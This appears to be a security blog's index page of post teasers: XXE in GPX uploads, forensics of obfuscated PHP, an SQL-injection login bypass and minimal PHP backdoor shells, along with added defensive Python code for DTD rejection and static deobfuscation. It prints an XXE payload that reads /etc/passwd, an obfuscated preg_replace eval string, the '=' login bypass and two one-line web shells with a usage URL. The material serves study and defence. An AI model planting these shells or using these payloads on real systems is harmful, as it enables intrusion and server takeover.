Secure HTTP proxy with squid through an SSH tunnel

Today I once again ran into an annoying geoblocking restriction. Free proxies usually perform poorly and aren't the best choice if you care about your security. Unfortunately, I also don't have a VPN set up, so I looked for another fast but secure solution. The result is a basic HTTP proxy whose access is restricted to an SSH tunnel. This post is a short write-up to record the steps I performed - and maybe it helps someone else searching for a similar solution. First, install the squid proxy from the…

XXE vulnerability on runtastic.com

NOTE: The described vulnerability has been responsibly disclosed to the runtastic team and has been fixed as of 07.04.2016. Last month I had to study for the exam of one of my university courses, "XML- and Webservice Security", when I had one of those "Too much theory, need more hands-on" moments. That's when I started digging around for services offering XML file uploads (or something similar). I remembered that runtastic allows manually uploading so-called "GPX" files to be added as a sports activity. GPX is…
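
An added example, not code from the post (the page says nothing about how runtastic actually parsed its uploads): a minimal GPX import in Python that refuses any document declaring a DTD before the real parser sees it, run against a constructed harmless track and a constructed textbook XXE payload. The namespace is the public GPX 1.1 one; the file contents are made up for the demo. Python's expat-based stdlib parsers do not fetch external entities on their own, but the explicit DTD check is a control that does not depend on parser defaults and is what you want in front of any parser that does resolve them.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

GPX_NS = "http://www.topografix.com/GPX/1/1"

# Constructed sample uploads: a harmless two-point track, and the same
# document type carrying a textbook external-entity declaration.
BENIGN_GPX = b"""<?xml version="1.0" encoding="UTF-8"?>
<gpx version="1.1" creator="constructed sample" xmlns="http://www.topografix.com/GPX/1/1">
  <trk><name>Morning run</name><trkseg>
    <trkpt lat="48.2082" lon="16.3738"><ele>171</ele></trkpt>
    <trkpt lat="48.2100" lon="16.3700"><ele>173</ele></trkpt>
  </trkseg></trk>
</gpx>
"""

XXE_GPX = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE gpx [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<gpx version="1.1" creator="constructed sample" xmlns="http://www.topografix.com/GPX/1/1">
  <trk><name>&xxe;</name></trk>
</gpx>
"""


class UnsafeXMLError(ValueError):
    """The upload declares a DTD, which a GPX file never legitimately needs."""


def reject_dtd(data: bytes) -> None:
    """Pre-parse pass with expat that aborts on any DOCTYPE or entity declaration.

    Nothing is fetched during this pass: no ExternalEntityRefHandler is
    installed and parameter-entity parsing is switched off, so the check
    itself cannot be turned into the file read it is meant to prevent.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE '{name}' not allowed in GPX upload")

    def on_entity(name, is_parameter, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"entity declaration '{name}' not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from None


def parse_trackpoints(data: bytes):
    """Return the (lat, lon) pairs of a GPX upload, rejecting DTDs first."""
    reject_dtd(data)
    root = ET.fromstring(data)
    return [(float(pt.get("lat")), float(pt.get("lon")))
            for pt in root.iter(f"{{{GPX_NS}}}trkpt")]


def is_rejected(data: bytes) -> bool:
    """True if the upload is refused as unsafe (used by the demo below)."""
    try:
        parse_trackpoints(data)
    except UnsafeXMLError:
        return True
    return False


if __name__ == "__main__":
    print(parse_trackpoints(BENIGN_GPX))
    print("XXE sample rejected:", is_rejected(XXE_GPX))
```

The check is deliberately coarse: any DOCTYPE at all is refused rather than trying to tell harmless internal subsets from dangerous ones, since a track upload has no business shipping a DTD in the first place.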

Forensic Analysis of a Suspicious PHP File

When an attacker leaves behind malicious PHP code - for persistence or further attacks on regular visitors - they typically make some attempt to obfuscate it. In the course of a forensic analysis, I was presented with such a suspicious and highly obfuscated file (note the \x65 after the closing pattern delimiter: it is an "e", the preg_replace modifier that evaluates the replacement string as PHP code): <?php preg_replace("/(.*)/\x65","\x45\x56\x61\x4c\x28\x27\x24\x76\x30\x30\x37\x64\x63\x35\x65\x38\x63\x39\x32\x39\x64\x37\x39\x38\x34\x64\x35\x66\x66\x33\x37\x66\x34\x39\x31\x62\x37\x32\x65\x62\…

Shell Upload through Blind SQL Injection

During a recent security audit I was able to upload a PHP shell thanks to a deadly combination of a blind SQL injection vulnerability and misconfigured privileges. As is often the case, I was presented with a simple login mask as the entry to the admin interface. The login could be easily bypassed by typing '='. (Why this SQL injection works is best described by the comments on this bug report: http://bugs.mysql.com/bug.php?id=39337 - in short, a condition like password='' becomes password=''='', which MySQL evaluates left to right as (password='')='', i.e. 0='', and that is true because the empty string is converted to 0 for the comparison.) Unfortunately, there wasn't much to mess with within the admin interface, so I kept focussing…

Minimal PHP Backdoor Shells

During a penetration test or for demonstration purposes it's often necessary to upload a (PHP) web shell through a discovered vulnerability. There are several complex (and interactive) backdoor shells on the web, but for minimal purposes these two snippets, presented at the "HackPra" course at my university, work perfectly well: <?php $_GET[0]($_GET[1]); Simply two GET parameters, where the first one defines the function to call and the second one the command. Callable via e.g. backdoor.php?0=system&1=ls <?php $$_GET['data']=$_GET['to']…
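
An added example that serves both the forensic post above and the minimal shells here, and is code from neither post: a small Python pass that statically decodes the hex-escaped PHP string literals (so the sample is read, never executed) and flags the constructs the two teasers show - the /e modifier of preg_replace, eval, and request parameters used as a function name or as a variable name. The sample file is a shortened, constructed version of the quoted pattern; the real payload on the page is truncated. Indicator names and the escape handling are my own choices.

```python
import re

# Constructed sample in the shape of the quoted file (shortened): the whole
# program is hidden in hex escapes that PHP's compiler resolves silently.
SUSPICIOUS_PHP = r'''<?php preg_replace("/(.*)/\x65", "\x45\x56\x61\x4c\x28\x27\x24\x76\x27\x29\x3b", "");'''

# Escape sequences PHP resolves inside double-quoted strings: hex (1-2 digits),
# octal (1-3 digits) and the single-character escapes. Unknown escapes such as
# a backslash followed by "z" are kept verbatim, as PHP keeps them.
_PHP_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)')
_SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', 'v': '\v', 'f': '\f',
           'e': '\x1b', '\\': '\\', '$': '$', '"': '"'}


def php_unescape(literal: str) -> str:
    """Decode the body of a double-quoted PHP literal the way the compiler does."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))
        return _SIMPLE.get(m.group(3), '\\' + m.group(3))
    return _PHP_ESCAPE.sub(repl, literal)


# A double-quoted literal: anything but a quote or backslash, or an escape pair.
# (Single-quoted literals containing a double quote would confuse this; good
# enough for a first triage pass over a dropped file.)
_DOUBLE_QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)


def deobfuscate_literals(src: str) -> str:
    """Rewrite every double-quoted literal in PHP source into its decoded form."""
    return _DOUBLE_QUOTED.sub(lambda m: '"' + php_unescape(m.group(1)) + '"', src)


# Constructs worth flagging in the decoded source. preg_replace's /e modifier
# evaluated the replacement as PHP code (deprecated in PHP 5.5, removed in 7.0).
INDICATORS = [
    ("preg_replace with /e modifier",
     re.compile(r'preg_replace\s*\(\s*["\']/.*?/[A-Za-z]*e[A-Za-z]*["\']', re.I)),
    ("eval() call", re.compile(r'\beval\s*\(', re.I)),
    ("request parameter used as function name",
     re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(', re.I)),
    ("variable variable built from request parameter",
     re.compile(r'\$\$_(?:GET|POST|REQUEST|COOKIE)\s*\[', re.I)),
]


def scan(src: str):
    """Indicator names found in the source after decoding its literals."""
    decoded = deobfuscate_literals(src)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def analyze(src: str):
    """(decoded source, findings) for a suspicious file."""
    return deobfuscate_literals(src), scan(src)


if __name__ == "__main__":
    decoded, findings = analyze(SUSPICIOUS_PHP)
    print(decoded)
    print(findings)
    print(scan("<?php $_GET[0]($_GET[1]);"))
    print(scan("<?php $$_GET['data']=$_GET['to'];"))
```

Decoding the literals is done on the text only; nothing from the file is ever passed to a PHP interpreter, which is the point of a forensic pass over code you do not trust. Expect the scan to over-report on legitimate code that happens to use eval; the decoded source is what you actually read.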
